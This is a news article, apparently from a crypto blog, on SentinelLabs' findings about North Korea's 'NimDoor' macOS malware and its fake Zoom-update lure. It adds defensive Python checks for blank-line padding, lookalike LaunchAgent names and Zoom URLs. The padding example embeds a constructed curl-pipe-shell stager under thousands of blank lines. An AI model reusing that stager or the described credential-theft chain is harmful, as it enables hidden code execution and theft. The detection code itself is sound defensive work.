SentinelLabs has uncovered a new and alarming cyberattack campaign run by North Korean hackers, built around a previously unseen malware family dubbed “NimDoor.” Written largely in the relatively uncommon Nim programming language, the malware poses as a Zoom software update and is delivered through a lure that starts on Telegram, specifically targeting Web3 and cryptocurrency companies. The campaign, detailed in a SentinelLabs report published on July 2, 2025, shows the evolving tradecraft of DPRK-aligned threat actors: they rely on social engineering rather than any macOS vulnerability to get a foothold, then steal sensitive data, including cryptocurrency wallet credentials.

The attack begins with a familiar yet effective social engineering tactic: the hackers impersonate trusted contacts on Telegram and lure victims into scheduling a Zoom call via Calendly. The victim then receives an email containing a malicious “Zoom SDK update” AppleScript, padded with thousands of blank lines so that the single command doing the real work sits far below what a casual reviewer, or a scanner that only looks at the top of the file, would ever see.
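The blank-line padding is cheap to spot once you look for it. The following triage check is an added example, not SentinelLabs' tooling or the actual lure script: it counts blank lines, finds the longest run of consecutive empty lines, and returns the few non-blank lines a reviewer should actually read. The sample script, the thresholds in `is_padded`, and the stager URL are all constructed for this example.

```python
"""Triage check for a script padded with thousands of blank lines.

Added example, not SentinelLabs' tooling.  Given the text of a script it
counts blank lines, finds the longest run of consecutive blank lines and
returns the non-blank 'effective' lines a reviewer should read.  The
SAMPLE_SCRIPT below is constructed for this example and is not the real
"Zoom SDK update" payload.
"""
from dataclasses import dataclass, field


@dataclass
class PaddingReport:
    total_lines: int
    blank_lines: int
    longest_blank_run: int
    effective_lines: list[str] = field(default_factory=list)

    @property
    def blank_ratio(self) -> float:
        return self.blank_lines / self.total_lines if self.total_lines else 0.0


def analyze_padding(text: str) -> PaddingReport:
    """Walk the script once, tracking blank-line runs and keeping real lines."""
    lines = text.splitlines()
    blank = run = longest = 0
    effective = []
    for line in lines:
        if line.strip() == "":
            blank += 1
            run += 1
            longest = max(longest, run)
        else:
            run = 0
            effective.append(line)
    return PaddingReport(len(lines), blank, longest, effective)


def is_padded(report: PaddingReport, min_run: int = 500, min_ratio: float = 0.9) -> bool:
    """Flag a script that is mostly whitespace with one very long blank run.

    The thresholds are assumptions chosen for this example; legitimate
    scripts rarely carry hundreds of consecutive empty lines."""
    return report.longest_blank_run >= min_run and report.blank_ratio >= min_ratio


# Constructed sample: a benign-looking header, 3000 empty lines, then a
# curl-pipe-shell stager hidden at the very bottom of the file.
SAMPLE_SCRIPT = (
    "-- Zoom SDK support helper\n"
    "set sdkVersion to \"6.0\"\n"
    + "\n" * 3000
    + "do shell script \"curl -s https://example.invalid/stage2 | sh\"\n"
)

if __name__ == "__main__":
    rep = analyze_padding(SAMPLE_SCRIPT)
    print(f"{rep.total_lines} lines, {rep.blank_lines} blank, "
          f"longest blank run {rep.longest_blank_run}")
    for ln in rep.effective_lines:
        print("   ", ln)
    print("padded:", is_padded(rep))
```

Run it on any `.scpt` source, shell script or installer post-install script you receive by email; a file that is 99% empty lines with a `do shell script` or `curl | sh` at the end is exactly the shape described above.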

Once executed, the script kicks off NimDoor, a multi-stage malware chain that combines AppleScript, Bash, C++ and Nim-compiled binaries to infiltrate macOS systems. Nim, a cross-platform language rarely seen in malware, lets the attackers build lightweight executables from a single code base that can be compiled for macOS, Windows and Linux, and that few analysts and detection tools have much experience with.

NimDoor’s sophistication lies in how it slips past Apple’s built-in security measures: at the time of the report, Apple’s bundled malware signatures did not flag it. The attack chain centres on two primary Mach-O binaries, one written in C++ and one in Nim, responsible for persistence and data exfiltration.

The malware installs deceptively named files such as “GoogIe LLC” (a capital “I” standing in for the lowercase “l” of “Google”) and “CoreKitAgent.” CoreKitAgent runs a kqueue-driven event loop and installs handlers for termination signals, so an attempt to kill the process triggers it to re-write its LaunchAgent and a fresh copy of itself; the LaunchAgent in turn brings it back after a reboot. Bash scripts named “upl” and “tlgrm” collect sensitive data: browser credentials, Keychain passwords and shell history in the first case, and Telegram’s encrypted local database and its key file in the second, which may expose cryptocurrency wallet keys and private messages.
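Lookalike vendor names such as “GoogIe LLC” are a hunting opportunity: a LaunchAgent whose label or program path matches a real vendor only after you fold confusable characters is almost certainly not that vendor. The check below is an added example, not SentinelLabs' or Apple's tooling. It parses LaunchAgent plists with the standard library, folds a small set of confusable characters (capital I vs lowercase l, digit 0 vs letter o, a few Cyrillic lookalikes), compares against a short vendor allowlist, and also notes the RunAtLoad plus KeepAlive combination that keeps an agent relaunching. The plists, the confusable map and the vendor list are constructed assumptions for this example, not an exhaustive reference.

```python
"""Hunt for lookalike LaunchAgent names such as "GoogIe LLC".

Added example, not SentinelLabs' or Apple's tooling.  Parses a LaunchAgent
plist, folds characters that are easily confused in common UI fonts and
compares the result with a small vendor allowlist.  A name that equals a
known vendor only after folding is a lookalike and is reported.  The plists,
the confusable map and the vendor list are constructed for this example.
"""
import plistlib

# Minimal confusable map (assumption; extend from Unicode TR39 for real use).
CONFUSABLES = str.maketrans({
    "I": "l", "1": "l", "|": "l",
    "0": "o", "О": "o",                       # Cyrillic capital O -> latin o
    "а": "a", "е": "e", "с": "c", "р": "p",  # Cyrillic lookalikes of a e c p
})

# Vendor names a legitimate agent might carry (assumption, not exhaustive).
KNOWN_VENDORS = {"google", "google llc", "apple", "apple inc", "zoom"}


def fold(name: str) -> str:
    """Lowercase after folding confusables, so 'GoogIe LLC' -> 'google llc'."""
    return name.translate(CONFUSABLES).lower()


def is_lookalike(name: str) -> bool:
    """True when the name matches a known vendor only after folding."""
    return name.lower() not in KNOWN_VENDORS and fold(name) in KNOWN_VENDORS


def check_launch_agent(plist_bytes: bytes) -> list[str]:
    """Return findings for one LaunchAgent plist (empty list means nothing odd)."""
    findings = []
    plist = plistlib.loads(plist_bytes)
    label = str(plist.get("Label", ""))
    args = plist.get("ProgramArguments") or []
    program = str(plist.get("Program") or (args[0] if args else ""))
    # Inspect the whole label, each dotted label component and each path component.
    candidates = [label] + label.split(".") + [c for c in program.split("/") if c]
    for cand in dict.fromkeys(candidates):          # de-duplicate, keep order
        if is_lookalike(cand):
            findings.append(f"lookalike name {cand!r} folds to {fold(cand)!r}")
    if plist.get("RunAtLoad") and plist.get("KeepAlive"):
        findings.append("RunAtLoad and KeepAlive set: relaunched at login and whenever it exits")
    return findings


# Constructed sample plists (not recovered from a real infection).
SUSPICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.GoogIe.agent</string>
  <key>ProgramArguments</key><array>
    <string>/Users/victim/Library/Application Support/GoogIe LLC/CoreKitAgent</string>
  </array>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.google.keystone.agent</string>
  <key>ProgramArguments</key><array>
    <string>/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdateAgent</string>
  </array>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for name, blob in (("suspicious", SUSPICIOUS_PLIST), ("benign", BENIGN_PLIST)):
        print(name, check_launch_agent(blob) or ["no findings"])
```

Point it at every file under `~/Library/LaunchAgents` and `/Library/LaunchAgents`; the kqueue and signal-handler tricks described above only matter if the agent plist survives, so that directory is where the persistence is actually visible.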

The campaign, first observed targeting a Web3 startup in April 2025, reflects a broader shift in North Korean tooling. Having previously relied on languages such as Go and Rust, DPRK operators are now leveraging Nim’s compile-time function execution, which runs developer code during compilation and produces binaries in which compile-time and run-time logic are interleaved, complicating static analysis and detection.

This underlines the growing threat to macOS and puts to rest the myth that Apple devices are immune to malware. According to TRM Labs, North Korea-linked groups stole over $1.6 billion from cryptocurrency firms in the first half of 2025 alone, and NimDoor is the latest addition to their arsenal.

SentinelLabs advises crypto firms to block unsigned installer packages, to accept Zoom updates only from zoom.us rather than from links sent by a contact, and to audit Telegram contacts for suspicious activity. As these campaigns grow more sophisticated, no industry or platform is off limits, and vigilance remains critical.
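“Only from zoom.us” is easy to get wrong in code: a naive `"zoom.us" in url` test accepts `zoom.us.attacker.example` and `https://zoom.us@attacker.example/`. The helper below is an added example, not SentinelLabs' or Zoom's code; it parses the link, requires HTTPS and a host that is exactly zoom.us or a subdomain of it, and rejects the userinfo trick. The trusted-domain list and the sample URLs are constructed assumptions for this example.

```python
"""Check that an "update" link really points at Zoom's own domain.

Added example, not SentinelLabs' or Zoom's code.  A substring test such as
'"zoom.us" in url' is fooled by zoom.us.attacker.example and by
https://zoom.us@attacker.example/; this helper parses the URL instead and
requires HTTPS plus a host that is zoom.us or a subdomain of it.  The
trusted-domain tuple and the sample URLs are constructed for this example.
"""
from urllib.parse import urlsplit

# Assumption: the only first-party domain this check trusts.
TRUSTED_ZOOM_DOMAINS = ("zoom.us",)


def is_trusted_zoom_url(url: str) -> bool:
    """True only for https URLs whose host is zoom.us or a subdomain of it."""
    parts = urlsplit(url)
    if parts.scheme != "https":
        return False
    if parts.username or parts.password:       # https://zoom.us@attacker.example/
        return False
    host = (parts.hostname or "").lower().rstrip(".")   # drop trailing dot
    return any(host == d or host.endswith("." + d) for d in TRUSTED_ZOOM_DOMAINS)


# Constructed sample links, as they might arrive in a message or email.
SAMPLE_LINKS = [
    "https://zoom.us/client/latest/Zoom.pkg",
    "https://cdn.zoom.us/client/latest/Zoom.pkg",
    "https://ZOOM.US./download",
    "http://zoom.us/client/latest/Zoom.pkg",
    "https://zoom.us.attacker.example/zoom_sdk_update.scpt",
    "https://zoomus.example/update",
    "https://zoom.us@attacker.example/update",
]

if __name__ == "__main__":
    for link in SAMPLE_LINKS:
        print("TRUST " if is_trusted_zoom_url(link) else "REJECT", link)
```

This only validates where a link points; a package downloaded from a trusted host still needs its signature checked (`pkgutil --check-signature` on macOS) before it is allowed to run, which is the other half of the advice above.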

I'm the proud founder of Cryptoandtechtimes.com, a passionate storyteller with four years of digging deep into blockchain, crypto, and web3 business development. I love breaking down complex tech into juicy insights that spark curiosity and inspire action. When I'm not writing or building in the decentralized world, I'm chasing the next big idea to empower our crypto community.